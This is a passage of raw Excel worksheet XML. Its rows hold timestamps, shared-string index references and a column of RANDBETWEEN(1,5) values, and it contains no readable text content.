      </c>
      <c r="F25933">
        <f t="shared" ca="1" si="405"/>
        <v>5</v>
      </c>
    </row>
    <row r="25934" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25934" s="1">
        <v>42937.013298611113</v>
      </c>
      <c r="C25934" t="s">
        <v>140</v>
      </c>
      <c r="D25934" t="s">
        <v>234</v>
      </c>
      <c r="E25934" s="2" t="s">
        <v>23556</v>
      </c>
      <c r="F25934">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25935" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A25935" s="1">
        <v>42936.988506944443</v>
      </c>
      <c r="C25935" t="s">
        <v>140</v>
      </c>
      <c r="D25935" t="s">
        <v>141</v>
      </c>
      <c r="E25935" s="2" t="s">
        <v>23557</v>
      </c>
      <c r="F25935">
        <f t="shared" ca="1" si="405"/>
        <v>3</v>
      </c>
    </row>
    <row r="25936" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25936" s="1">
        <v>42936.922129629631</v>
      </c>
      <c r="C25936" t="s">
        <v>73</v>
      </c>
      <c r="E25936" t="s">
        <v>23558</v>
      </c>
      <c r="F25936">
        <f t="shared" ca="1" si="405"/>
        <v>3</v>
      </c>
    </row>
    <row r="25937" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25937" s="1">
        <v>42936.814143518517</v>
      </c>
      <c r="C25937" t="s">
        <v>6</v>
      </c>
      <c r="D25937" t="s">
        <v>25</v>
      </c>
      <c r="E25937" t="s">
        <v>23559</v>
      </c>
      <c r="F25937">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25938" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A25938" s="1">
        <v>42936.77412037037</v>
      </c>
      <c r="C25938" t="s">
        <v>10</v>
      </c>
      <c r="D25938" t="s">
        <v>89</v>
      </c>
      <c r="E25938" s="2" t="s">
        <v>23560</v>
      </c>
      <c r="F25938">
        <f t="shared" ca="1" si="405"/>
        <v>3</v>
      </c>
    </row>
    <row r="25939" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25939" s="1">
        <v>42936.712187500001</v>
      </c>
      <c r="C25939" t="s">
        <v>10</v>
      </c>
      <c r="D25939" t="s">
        <v>80</v>
      </c>
      <c r="E25939" s="2" t="s">
        <v>23561</v>
      </c>
      <c r="F25939">
        <f t="shared" ca="1" si="405"/>
        <v>4</v>
      </c>
    </row>
    <row r="25940" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25940" s="1">
        <v>42936.69458333333</v>
      </c>
      <c r="C25940" t="s">
        <v>10</v>
      </c>
      <c r="D25940" t="s">
        <v>52</v>
      </c>
      <c r="E25940" t="s">
        <v>4165</v>
      </c>
      <c r="F25940">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25941" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25941" s="1">
        <v>42936.672800925924</v>
      </c>
      <c r="C25941" t="s">
        <v>60</v>
      </c>
      <c r="D25941" t="s">
        <v>312</v>
      </c>
      <c r="E25941" t="s">
        <v>23562</v>
      </c>
      <c r="F25941">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25942" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25942" s="1">
        <v>42936.61341435185</v>
      </c>
      <c r="C25942" t="s">
        <v>10</v>
      </c>
      <c r="D25942" t="s">
        <v>36</v>
      </c>
      <c r="E25942" t="s">
        <v>23563</v>
      </c>
      <c r="F25942">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25943" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25943" s="1">
        <v>42936.599675925929</v>
      </c>
      <c r="C25943" t="s">
        <v>10</v>
      </c>
      <c r="D25943" t="s">
        <v>41</v>
      </c>
      <c r="E25943" s="2" t="s">
        <v>23564</v>
      </c>
      <c r="F25943">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25944" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25944" s="1">
        <v>42936.598437499997</v>
      </c>
      <c r="C25944" t="s">
        <v>41</v>
      </c>
      <c r="E25944" t="s">
        <v>23565</v>
      </c>
      <c r="F25944">
        <f t="shared" ca="1" si="405"/>
        <v>3</v>
      </c>
    </row>
    <row r="25945" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25945" s="1">
        <v>42936.585370370369</v>
      </c>
      <c r="C25945" t="s">
        <v>4970</v>
      </c>
      <c r="E25945" t="s">
        <v>23566</v>
      </c>
      <c r="F25945">
        <f t="shared" ca="1" si="405"/>
        <v>3</v>
      </c>
    </row>
    <row r="25946" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25946" s="1">
        <v>42936.555254629631</v>
      </c>
      <c r="C25946" t="s">
        <v>10</v>
      </c>
      <c r="D25946" t="s">
        <v>36</v>
      </c>
      <c r="E25946" t="s">
        <v>23567</v>
      </c>
      <c r="F25946">
        <f t="shared" ca="1" si="405"/>
        <v>4</v>
      </c>
    </row>
    <row r="25947" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A25947" s="1">
        <v>42936.517627314817</v>
      </c>
      <c r="C25947" t="s">
        <v>10</v>
      </c>
      <c r="D25947" t="s">
        <v>56</v>
      </c>
      <c r="E25947" s="2" t="s">
        <v>23568</v>
      </c>
      <c r="F25947">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25948" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25948" s="1">
        <v>42936.509826388887</v>
      </c>
      <c r="C25948" t="s">
        <v>260</v>
      </c>
      <c r="E25948" t="s">
        <v>23569</v>
      </c>
      <c r="F25948">
        <f t="shared" ca="1" si="405"/>
        <v>5</v>
      </c>
    </row>
    <row r="25949" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25949" s="1">
        <v>42936.484942129631</v>
      </c>
      <c r="C25949" t="s">
        <v>10</v>
      </c>
      <c r="D25949" t="s">
        <v>20</v>
      </c>
      <c r="E25949" t="s">
        <v>23570</v>
      </c>
      <c r="F25949">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25950" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25950" s="1">
        <v>42936.469178240739</v>
      </c>
      <c r="C25950" t="s">
        <v>48</v>
      </c>
      <c r="E25950" t="s">
        <v>23571</v>
      </c>
      <c r="F25950">
        <f t="shared" ca="1" si="405"/>
        <v>5</v>
      </c>
    </row>
    <row r="25951" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25951" s="1">
        <v>42936.467673611114</v>
      </c>
      <c r="C25951" t="s">
        <v>10</v>
      </c>
      <c r="D25951" t="s">
        <v>46</v>
      </c>
      <c r="E25951" s="2" t="s">
        <v>23572</v>
      </c>
      <c r="F25951">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25952" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25952" s="1">
        <v>42936.450092592589</v>
      </c>
      <c r="C25952" t="s">
        <v>10</v>
      </c>
      <c r="D25952" t="s">
        <v>80</v>
      </c>
      <c r="E25952" s="2" t="s">
        <v>23573</v>
      </c>
      <c r="F25952">
        <f t="shared" ca="1" si="405"/>
        <v>3</v>
      </c>
    </row>
    <row r="25953" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25953" s="1">
        <v>42936.44902777778</v>
      </c>
      <c r="C25953" t="s">
        <v>10</v>
      </c>
      <c r="D25953" t="s">
        <v>80</v>
      </c>
      <c r="E25953" t="s">
        <v>6496</v>
      </c>
      <c r="F25953">
        <f t="shared" ca="1" si="405"/>
        <v>4</v>
      </c>
    </row>
    <row r="25954" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25954" s="1">
        <v>42936.446226851855</v>
      </c>
      <c r="C25954" t="s">
        <v>10</v>
      </c>
      <c r="D25954" t="s">
        <v>46</v>
      </c>
      <c r="E25954" t="s">
        <v>23574</v>
      </c>
      <c r="F25954">
        <f t="shared" ca="1" si="405"/>
        <v>5</v>
      </c>
    </row>
    <row r="25955" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25955" s="1">
        <v>42936.423449074071</v>
      </c>
      <c r="C25955" t="s">
        <v>124</v>
      </c>
      <c r="E25955" s="2" t="s">
        <v>23575</v>
      </c>
      <c r="F25955">
        <f t="shared" ca="1" si="405"/>
        <v>5</v>
      </c>
    </row>
    <row r="25956" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A25956" s="1">
        <v>42936.404409722221</v>
      </c>
      <c r="C25956" t="s">
        <v>65</v>
      </c>
      <c r="E25956" s="2" t="s">
        <v>23576</v>
      </c>
      <c r="F25956">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25957" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25957" s="1">
        <v>42936.398541666669</v>
      </c>
      <c r="C25957" t="s">
        <v>10</v>
      </c>
      <c r="D25957" t="s">
        <v>92</v>
      </c>
      <c r="E25957" t="s">
        <v>23577</v>
      </c>
      <c r="F25957">
        <f t="shared" ca="1" si="405"/>
        <v>3</v>
      </c>
    </row>
    <row r="25958" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25958" s="1">
        <v>42936.375451388885</v>
      </c>
      <c r="C25958" t="s">
        <v>10</v>
      </c>
      <c r="D25958" t="s">
        <v>23</v>
      </c>
      <c r="E25958" t="s">
        <v>23578</v>
      </c>
      <c r="F25958">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25959" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25959" s="1">
        <v>42936.353912037041</v>
      </c>
      <c r="C25959" t="s">
        <v>6</v>
      </c>
      <c r="D25959" t="s">
        <v>194</v>
      </c>
      <c r="E25959" s="2" t="s">
        <v>23579</v>
      </c>
      <c r="F25959">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25960" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A25960" s="1">
        <v>42936.313206018516</v>
      </c>
      <c r="C25960" t="s">
        <v>48</v>
      </c>
      <c r="E25960" s="2" t="s">
        <v>23580</v>
      </c>
      <c r="F25960">
        <f t="shared" ca="1" si="405"/>
        <v>4</v>
      </c>
    </row>
    <row r="25961" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25961" s="1">
        <v>42936.240162037036</v>
      </c>
      <c r="C25961" t="s">
        <v>318</v>
      </c>
      <c r="E25961" t="s">
        <v>23581</v>
      </c>
      <c r="F25961">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25962" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25962" s="1">
        <v>42936.227233796293</v>
      </c>
      <c r="C25962" t="s">
        <v>41</v>
      </c>
      <c r="E25962" t="s">
        <v>23582</v>
      </c>
      <c r="F25962">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25963" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A25963" s="1">
        <v>42936.226921296293</v>
      </c>
      <c r="C25963" t="s">
        <v>48</v>
      </c>
      <c r="E25963" s="2" t="s">
        <v>23583</v>
      </c>
      <c r="F25963">
        <f t="shared" ca="1" si="405"/>
        <v>5</v>
      </c>
    </row>
    <row r="25964" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25964" s="1">
        <v>42936.193240740744</v>
      </c>
      <c r="C25964" t="s">
        <v>535</v>
      </c>
      <c r="E25964" t="s">
        <v>23584</v>
      </c>
      <c r="F25964">
        <f t="shared" ca="1" si="405"/>
        <v>4</v>
      </c>
    </row>
    <row r="25965" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25965" s="1">
        <v>42936.182384259257</v>
      </c>
      <c r="C25965" t="s">
        <v>1931</v>
      </c>
      <c r="E25965" t="s">
        <v>23585</v>
      </c>
      <c r="F25965">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25966" s="1">
        <v>42936.145752314813</v>
      </c>
      <c r="C25966" t="s">
        <v>41</v>
      </c>
      <c r="E25966" t="s">
        <v>23586</v>
      </c>
      <c r="F25966">
        <f t="shared" ca="1" si="405"/>
        <v>3</v>
      </c>
    </row>
    <row r="25967" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A25967" s="1">
        <v>42936.122476851851</v>
      </c>
      <c r="C25967" t="s">
        <v>253</v>
      </c>
      <c r="E25967" s="2" t="s">
        <v>23587</v>
      </c>
      <c r="F25967">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25968" s="1">
        <v>42936.100671296299</v>
      </c>
      <c r="C25968" t="s">
        <v>318</v>
      </c>
      <c r="E25968" t="s">
        <v>23588</v>
      </c>
      <c r="F25968">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25969" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25969" s="1">
        <v>42936.099976851852</v>
      </c>
      <c r="C25969" t="s">
        <v>41</v>
      </c>
      <c r="F25969">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25970" s="1">
        <v>42936.093078703707</v>
      </c>
      <c r="C25970" t="s">
        <v>41</v>
      </c>
      <c r="E25970" t="s">
        <v>23589</v>
      </c>
      <c r="F25970">
        <f t="shared" ca="1" si="405"/>
        <v>4</v>
      </c>
    </row>
    <row r="25971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25971" s="1">
        <v>42936.070115740738</v>
      </c>
      <c r="C25971" t="s">
        <v>253</v>
      </c>
      <c r="E25971" t="s">
        <v>23590</v>
      </c>
      <c r="F25971">
        <f t="shared" ca="1" si="405"/>
        <v>3</v>
      </c>
    </row>
    <row r="25972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25972" s="1">
        <v>42936.068854166668</v>
      </c>
      <c r="C25972" t="s">
        <v>471</v>
      </c>
      <c r="E25972" t="s">
        <v>23591</v>
      </c>
      <c r="F25972">
        <f t="shared" ca="1" si="405"/>
        <v>3</v>
      </c>
    </row>
    <row r="25973" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25973" s="1">
        <v>42936.034768518519</v>
      </c>
      <c r="C25973" t="s">
        <v>41</v>
      </c>
      <c r="E25973" s="2" t="s">
        <v>23592</v>
      </c>
      <c r="F25973">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25974" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25974" s="1">
        <v>42935.839131944442</v>
      </c>
      <c r="C25974" t="s">
        <v>6</v>
      </c>
      <c r="D25974" t="s">
        <v>25</v>
      </c>
      <c r="F25974">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25975" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25975" s="1">
        <v>42935.73678240741</v>
      </c>
      <c r="C25975" t="s">
        <v>10</v>
      </c>
      <c r="E25975" t="s">
        <v>23593</v>
      </c>
      <c r="F25975">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25976" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A25976" s="1">
        <v>42935.731458333335</v>
      </c>
      <c r="C25976" t="s">
        <v>10</v>
      </c>
      <c r="D25976" t="s">
        <v>36</v>
      </c>
      <c r="E25976" s="2" t="s">
        <v>23594</v>
      </c>
      <c r="F25976">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25977" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25977" s="1">
        <v>42935.722418981481</v>
      </c>
      <c r="C25977" t="s">
        <v>10</v>
      </c>
      <c r="D25977" t="s">
        <v>17</v>
      </c>
      <c r="E25977" t="s">
        <v>23595</v>
      </c>
      <c r="F25977">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25978" s="1">
        <v>42935.688680555555</v>
      </c>
      <c r="C25978" t="s">
        <v>10</v>
      </c>
      <c r="D25978" t="s">
        <v>89</v>
      </c>
      <c r="E25978" t="s">
        <v>23596</v>
      </c>
      <c r="F25978">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25979" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25979" s="1">
        <v>42935.669351851851</v>
      </c>
      <c r="C25979" t="s">
        <v>10</v>
      </c>
      <c r="D25979" t="s">
        <v>6</v>
      </c>
      <c r="E25979" s="2" t="s">
        <v>23597</v>
      </c>
      <c r="F25979">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25980" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A25980" s="1">
        <v>42935.653738425928</v>
      </c>
      <c r="C25980" t="s">
        <v>10</v>
      </c>
      <c r="D25980" t="s">
        <v>89</v>
      </c>
      <c r="E25980" s="2" t="s">
        <v>23598</v>
      </c>
      <c r="F25980">
        <f t="shared" ca="1" si="405"/>
        <v>2</v>
      </c>
    </row>
    <row r="25981" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25981" s="1">
        <v>42935.631168981483</v>
      </c>
      <c r="C25981" t="s">
        <v>10</v>
      </c>
      <c r="D25981" t="s">
        <v>52</v>
      </c>
      <c r="E25981" s="2" t="s">
        <v>23599</v>
      </c>
      <c r="F25981">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25982" s="1">
        <v>42935.612916666665</v>
      </c>
      <c r="C25982" t="s">
        <v>6</v>
      </c>
      <c r="D25982" t="s">
        <v>25</v>
      </c>
      <c r="E25982" t="s">
        <v>23600</v>
      </c>
      <c r="F25982">
        <f t="shared" ca="1" si="405"/>
        <v>5</v>
      </c>
    </row>
    <row r="25983" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A25983" s="1">
        <v>42935.610613425924</v>
      </c>
      <c r="C25983" t="s">
        <v>10</v>
      </c>
      <c r="D25983" t="s">
        <v>112</v>
      </c>
      <c r="E25983" s="2" t="s">
        <v>23601</v>
      </c>
      <c r="F25983">
        <f t="shared" ca="1" si="405"/>
        <v>4</v>
      </c>
    </row>
    <row r="25984" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A25984" s="1">
        <v>42935.610543981478</v>
      </c>
      <c r="C25984" t="s">
        <v>3515</v>
      </c>
      <c r="E25984" s="2" t="s">
        <v>23602</v>
      </c>
      <c r="F25984">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25985" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A25985" s="1">
        <v>42935.608368055553</v>
      </c>
      <c r="C25985" t="s">
        <v>6</v>
      </c>
      <c r="D25985" t="s">
        <v>25</v>
      </c>
      <c r="E25985" s="2" t="s">
        <v>23603</v>
      </c>
      <c r="F25985">
        <f t="shared" ca="1" si="405"/>
        <v>1</v>
      </c>
    </row>
    <row r="25986" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25986" s="1">
        <v>42935.595648148148</v>
      </c>
      <c r="C25986" t="s">
        <v>10</v>
      </c>
      <c r="D25986" t="s">
        <v>89</v>
      </c>
      <c r="E25986" t="s">
        <v>23604</v>
      </c>
      <c r="F25986">
        <f t="shared" ref="F25986:F26049" ca="1" si="406">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="25987" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25987" s="1">
        <v>42935.583726851852</v>
      </c>
      <c r="C25987" t="s">
        <v>6</v>
      </c>
      <c r="D25987" t="s">
        <v>114</v>
      </c>
      <c r="E25987" t="s">
        <v>23605</v>
      </c>
      <c r="F25987">
        <f t="shared" ca="1" si="406"/>
        <v>2</v>
      </c>
    </row>
    <row r="25988" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25988" s="1">
        <v>42935.577719907407</v>
      </c>
      <c r="C25988" t="s">
        <v>10</v>
      </c>
      <c r="D25988" t="s">
        <v>80</v>
      </c>
      <c r="E25988" s="2" t="s">
        <v>23606</v>
      </c>
      <c r="F25988">
        <f t="shared" ca="1" si="406"/>
        <v>2</v>
      </c>
    </row>
    <row r="25989" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25989" s="1">
        <v>42935.561712962961</v>
      </c>
      <c r="C25989" t="s">
        <v>10</v>
      </c>
      <c r="D25989" t="s">
        <v>1036</v>
      </c>
      <c r="E25989" t="s">
        <v>23607</v>
      </c>
      <c r="F25989">
        <f t="shared" ca="1" si="406"/>
        <v>5</v>
      </c>
    </row>
    <row r="25990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25990" s="1">
        <v>42935.546817129631</v>
      </c>
      <c r="C25990" t="s">
        <v>16</v>
      </c>
      <c r="E25990" t="s">
        <v>23608</v>
      </c>
      <c r="F25990">
        <f t="shared" ca="1" si="406"/>
        <v>4</v>
      </c>
    </row>
    <row r="25991" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A25991" s="1">
        <v>42935.531481481485</v>
      </c>
      <c r="C25991" t="s">
        <v>10</v>
      </c>
      <c r="D25991" t="s">
        <v>20</v>
      </c>
      <c r="E25991" s="2" t="s">
        <v>23609</v>
      </c>
      <c r="F25991">
        <f t="shared" ca="1" si="406"/>
        <v>2</v>
      </c>
    </row>
    <row r="25992" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A25992" s="1">
        <v>42935.524444444447</v>
      </c>
      <c r="C25992" t="s">
        <v>10</v>
      </c>
      <c r="D25992" t="s">
        <v>80</v>
      </c>
      <c r="E25992" s="2" t="s">
        <v>23610</v>
      </c>
      <c r="F25992">
        <f t="shared" ca="1" si="406"/>
        <v>4</v>
      </c>
    </row>
    <row r="25993" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25993" s="1">
        <v>42935.516018518516</v>
      </c>
      <c r="C25993" t="s">
        <v>10</v>
      </c>
      <c r="D25993" t="s">
        <v>17</v>
      </c>
      <c r="E25993" t="s">
        <v>23611</v>
      </c>
      <c r="F25993">
        <f t="shared" ca="1" si="406"/>
        <v>3</v>
      </c>
    </row>
    <row r="25994" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25994" s="1">
        <v>42935.512129629627</v>
      </c>
      <c r="C25994" t="s">
        <v>10</v>
      </c>
      <c r="D25994" t="s">
        <v>39</v>
      </c>
      <c r="E25994" s="2" t="s">
        <v>23612</v>
      </c>
      <c r="F25994">
        <f t="shared" ca="1" si="406"/>
        <v>1</v>
      </c>
    </row>
    <row r="25995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25995" s="1">
        <v>42935.506076388891</v>
      </c>
      <c r="C25995" t="s">
        <v>10</v>
      </c>
      <c r="D25995" t="s">
        <v>89</v>
      </c>
      <c r="E25995" t="s">
        <v>23613</v>
      </c>
      <c r="F25995">
        <f t="shared" ca="1" si="406"/>
        <v>5</v>
      </c>
    </row>
    <row r="25996" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25996" s="1">
        <v>42935.504652777781</v>
      </c>
      <c r="C25996" t="s">
        <v>721</v>
      </c>
      <c r="E25996" s="2" t="s">
        <v>23614</v>
      </c>
      <c r="F25996">
        <f t="shared" ca="1" si="406"/>
        <v>2</v>
      </c>
    </row>
    <row r="25997" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25997" s="1">
        <v>42935.502210648148</v>
      </c>
      <c r="C25997" t="s">
        <v>1050</v>
      </c>
      <c r="E25997" t="s">
        <v>23615</v>
      </c>
      <c r="F25997">
        <f t="shared" ca="1" si="406"/>
        <v>1</v>
      </c>
    </row>
    <row r="25998" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25998" s="1">
        <v>42935.490034722221</v>
      </c>
      <c r="C25998" t="s">
        <v>10</v>
      </c>
      <c r="D25998" t="s">
        <v>89</v>
      </c>
      <c r="E25998" s="2" t="s">
        <v>23616</v>
      </c>
      <c r="F25998">
        <f t="shared" ca="1" si="406"/>
        <v>2</v>
      </c>
    </row>
    <row r="25999" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25999" s="1">
        <v>42935.472905092596</v>
      </c>
      <c r="C25999" t="s">
        <v>10</v>
      </c>
      <c r="D25999" t="s">
        <v>23</v>
      </c>
      <c r="E25999" t="s">
        <v>23617</v>
      </c>
      <c r="F25999">
        <f t="shared" ca="1" si="406"/>
        <v>2</v>
      </c>
    </row>
    <row r="26000" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26000" s="1">
        <v>42935.472893518519</v>
      </c>
      <c r="C26000" t="s">
        <v>10</v>
      </c>
      <c r="D26000" t="s">
        <v>23</v>
      </c>
      <c r="E26000" t="s">
        <v>23617</v>
      </c>
      <c r="F26000">
        <f t="shared" ca="1" si="406"/>
        <v>5</v>
      </c>
    </row>
    <row r="26001" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26001" s="1">
        <v>42935.472893518519</v>
      </c>
      <c r="C26001" t="s">
        <v>10</v>
      </c>
      <c r="D26001" t="s">
        <v>23</v>
      </c>
      <c r="E26001" t="s">
        <v>23617</v>
      </c>
      <c r="F26001">
        <f t="shared" ca="1" si="406"/>
        <v>4</v>
      </c>
    </row>
    <row r="26002" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A26002" s="1">
        <v>42935.463692129626</v>
      </c>
      <c r="C26002" t="s">
        <v>10</v>
      </c>
      <c r="D26002" t="s">
        <v>80</v>
      </c>
      <c r="E26002" s="2" t="s">
        <v>23618</v>
      </c>
      <c r="F26002">
        <f t="shared" ca="1" si="406"/>
        <v>5</v>
      </c>
    </row>
    <row r="26003" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26003" s="1">
        <v>42935.450127314813</v>
      </c>
      <c r="C26003" t="s">
        <v>10</v>
      </c>
      <c r="D26003" t="s">
        <v>112</v>
      </c>
      <c r="E26003" t="s">
        <v>23619</v>
      </c>
      <c r="F26003">
        <f t="shared" ca="1" si="406"/>
        <v>1</v>
      </c>
    </row>
    <row r="26004" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26004" s="1">
        <v>42935.449467592596</v>
      </c>
      <c r="C26004" t="s">
        <v>6</v>
      </c>
      <c r="D26004" t="s">
        <v>25</v>
      </c>
      <c r="E26004" s="2" t="s">
        <v>23620</v>
      </c>
      <c r="F26004">
        <f t="shared" ca="1" si="406"/>
        <v>3</v>
      </c>
    </row>
    <row r="26005" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26005" s="1">
        <v>42935.449432870373</v>
      </c>
      <c r="C26005" t="s">
        <v>6</v>
      </c>
      <c r="D26005" t="s">
        <v>194</v>
      </c>
      <c r="E26005" s="2" t="s">
        <v>23621</v>
      </c>
      <c r="F26005">
        <f t="shared" ca="1" si="406"/>
        <v>5</v>
      </c>
    </row>
    <row r="26006" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26006" s="1">
        <v>42935.443912037037</v>
      </c>
      <c r="C26006" t="s">
        <v>10</v>
      </c>
      <c r="D26006" t="s">
        <v>6</v>
      </c>
      <c r="E26006" t="s">
        <v>23622</v>
      </c>
      <c r="F26006">
        <f t="shared" ca="1" si="406"/>
        <v>4</v>
      </c>
    </row>
    <row r="26007" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26007" s="1">
        <v>42935.431712962964</v>
      </c>
      <c r="C26007" t="s">
        <v>6</v>
      </c>
      <c r="D26007" t="s">
        <v>602</v>
      </c>
      <c r="E26007" s="2" t="s">
        <v>23623</v>
      </c>
      <c r="F26007">
        <f t="shared" ca="1" si="406"/>
        <v>4</v>
      </c>
    </row>
    <row r="26008" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26008" s="1">
        <v>42935.428530092591</v>
      </c>
      <c r="C26008" t="s">
        <v>41</v>
      </c>
      <c r="E26008" t="s">
        <v>23624</v>
      </c>
      <c r="F26008">
        <f t="shared" ca="1" si="406"/>
        <v>1</v>
      </c>
    </row>
    <row r="26009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26009" s="1">
        <v>42935.415439814817</v>
      </c>
      <c r="C26009" t="s">
        <v>10</v>
      </c>
      <c r="D26009" t="s">
        <v>36</v>
      </c>
      <c r="E26009" t="s">
        <v>23625</v>
      </c>
      <c r="F26009">
        <f t="shared" ca="1" si="406"/>
        <v>2</v>
      </c>
    </row>
    <row r="26010" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26010" s="1">
        <v>42935.40965277778</v>
      </c>
      <c r="C26010" t="s">
        <v>10</v>
      </c>
      <c r="D26010" t="s">
        <v>112</v>
      </c>
      <c r="E26010" s="2" t="s">
        <v>23626</v>
      </c>
      <c r="F26010">
        <f t="shared" ca="1" si="406"/>
        <v>3</v>
      </c>
    </row>
    <row r="26011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26011" s="1">
        <v>42935.407337962963</v>
      </c>
      <c r="C26011" t="s">
        <v>10</v>
      </c>
      <c r="D26011" t="s">
